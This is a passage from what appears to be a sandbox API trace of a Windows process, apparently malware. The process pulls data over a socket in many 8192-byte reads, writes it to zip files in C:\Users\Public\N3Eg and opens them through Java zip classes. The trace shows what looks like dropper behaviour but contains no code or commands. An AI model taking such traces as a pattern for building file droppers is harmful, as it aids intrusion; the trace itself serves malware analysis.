argp=0x4bf124) returned 0 [0019.776] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.776] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.776] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.776] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.777] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.777] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.777] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.777] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.777] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.778] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.778] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.778] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.778] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.779] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.779] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.779] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.779] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.779] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.780] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.780] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.780] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.780] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.780] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.781] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.781] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.781] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.781] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.782] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.782] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.782] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.782] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.782] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.783] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.783] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.783] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.783] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.783] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.784] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.784] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.784] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.784] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.785] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.785] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.785] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.785] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.785] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.786] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.786] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.786] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.786] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.786] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.787] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.787] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.787] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.787] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.788] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.788] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.788] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.788] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.789] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.789] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.789] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.789] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.790] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.790] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.790] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.790] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.791] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.792] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.792] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.792] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.792] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.792] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.793] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.793] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.793] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.793] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.794] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.794] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.794] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.794] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.794] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.795] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.795] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.795] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.795] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.795] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.796] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.796] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.796] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.796] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.797] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.797] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.797] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.797] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.797] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.798] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.798] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.798] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.798] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.798] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.799] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.799] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.799] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.799] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.800] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.800] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.800] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.800] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 3326 [0019.800] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.801] wcslen (_String="C:\\Users\\Public\\N3Eg\\N3Eg2.zip") returned 0x1e [0019.801] wcscpy (in: _Dest=0x1501bfc0, _Source="C:\\Users\\Public\\N3Eg\\N3Eg2.zip" | out: _Dest="C:\\Users\\Public\\N3Eg\\N3Eg2.zip") returned="C:\\Users\\Public\\N3Eg\\N3Eg2.zip" [0019.801] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.zip" (normalized: "c:\\users\\public\\n3eg\\n3eg2.zip"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b0 [0019.831] WriteFile (in: hFile=0x2b0, lpBuffer=0x152c0020*, nNumberOfBytesToWrite=0xb6bc3, lpNumberOfBytesWritten=0x4bd360, lpOverlapped=0x0 | out: lpBuffer=0x152c0020*, lpNumberOfBytesWritten=0x4bd360, lpOverlapped=0x0) returned 1 [0019.854] CloseHandle (hObject=0x2b0) returned 1 [0019.877] send (in: s=0x290, buf=0x4be8d4*, len=182, flags=0 | out: buf=0x4be8d4*) returned 182 [0019.877] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.910] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.910] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.911] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.911] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.912] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.912] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.912] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.912] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.913] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.913] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.913] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.913] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.913] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.914] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.914] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.914] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.915] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.915] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.915] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.915] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.916] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.916] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.916] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.916] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.917] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.917] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.917] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.917] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.917] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.918] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.918] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.918] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.918] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.918] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.919] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.919] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.919] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.919] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.920] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.920] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.920] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.920] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.921] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.921] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.921] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.921] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.922] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.922] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.922] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.922] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.922] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.922] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.923] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.923] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.923] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.923] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.924] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.924] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.924] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.924] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.924] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.925] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.925] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.925] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.925] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.925] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.926] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.926] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.926] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.926] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.927] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.927] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.927] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.927] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.928] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.928] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.928] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.928] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.929] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.929] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.929] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.929] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.929] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.930] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.930] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.930] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.930] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.930] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.931] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.931] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.931] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.931] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.932] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.932] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.932] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.932] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.933] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.933] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.933] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.933] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 8192 [0019.933] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.933] recv (in: s=0x290, buf=0x15067130, len=8192, flags=0 | out: buf=0x15067130*) returned 3816 [0019.934] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.935] wcslen (_String="C:\\Users\\Public\\N3Eg\\N3Eg4.zip") returned 0x1e [0019.935] wcscpy (in: _Dest=0x1501bfc0, _Source="C:\\Users\\Public\\N3Eg\\N3Eg4.zip" | out: _Dest="C:\\Users\\Public\\N3Eg\\N3Eg4.zip") returned="C:\\Users\\Public\\N3Eg\\N3Eg4.zip" [0019.935] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg4.zip" (normalized: "c:\\users\\public\\n3eg\\n3eg4.zip"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b0 [0019.941] WriteFile (in: hFile=0x2b0, lpBuffer=0x15067130*, nNumberOfBytesToWrite=0x66dad, lpNumberOfBytesWritten=0x4bd340, lpOverlapped=0x0 | out: lpBuffer=0x15067130*, lpNumberOfBytesWritten=0x4bd340, lpOverlapped=0x0) returned 1 [0019.951] CloseHandle (hObject=0x2b0) returned 1 [0019.958] wcslen (_String="C:\\Users\\Public\\N3Eg") returned 0x14 [0019.958] wcscpy (in: _Dest=0xb9a3b0, _Source="C:\\Users\\Public\\N3Eg" | out: _Dest="C:\\Users\\Public\\N3Eg") returned="C:\\Users\\Public\\N3Eg" [0019.958] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\N3Eg", nBufferLength=0x9, lpBuffer=0x4bf3c0, lpFilePart=0x4bf3bc | out: lpBuffer="", lpFilePart=0x4bf3bc) returned 0x15 [0019.958] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\N3Eg", fInfoLevelId=0x0, lpFileInformation=0x4bf3b0 | out: lpFileInformation=0x4bf3b0) returned 1 [0019.958] strlen (_Str="java/util/zip/ZipInputStream") returned 0x1c [0019.969] wcslen (_String="C:\\Users\\Public\\N3Eg\\N3Eg4.zip") returned 0x1e [0019.969] wcscpy (in: _Dest=0x1501bfc0, _Source="C:\\Users\\Public\\N3Eg\\N3Eg4.zip" | out: _Dest="C:\\Users\\Public\\N3Eg\\N3Eg4.zip") returned="C:\\Users\\Public\\N3Eg\\N3Eg4.zip" [0019.969] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg4.zip" (normalized: "c:\\users\\public\\n3eg\\n3eg4.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b0 [0019.970] calloc (_Count=0x1, _Size=0x38) returned 0xb9a3b0 [0019.974] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd294, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bd25c, lpOverlapped=0x0 | out: lpBuffer=0x4bd294*, lpNumberOfBytesRead=0x4bd25c*=0x1e, lpOverlapped=0x0) returned 1 [0019.975] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd294, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x4bd25c, lpOverlapped=0x0 | out: lpBuffer=0x4bd294*, lpNumberOfBytesRead=0x4bd25c*=0x5, lpOverlapped=0x0) returned 1 [0019.976] strlen (_Str="java/util/zip/ZipEntry") returned 0x16 [0019.976] wcslen (_String="C:\\Users\\Public\\N3Eg") returned 0x14 [0019.976] wcscpy (in: _Dest=0xb9a3f0, _Source="C:\\Users\\Public\\N3Eg" | out: _Dest="C:\\Users\\Public\\N3Eg") returned="C:\\Users\\Public\\N3Eg" [0019.976] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\N3Eg", nBufferLength=0x9, lpBuffer=0x4bf390, lpFilePart=0x4bf38c | out: lpBuffer="", lpFilePart=0x4bf38c) returned 0x15 [0019.976] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\N3Eg", fInfoLevelId=0x0, lpFileInformation=0x4bf380 | out: 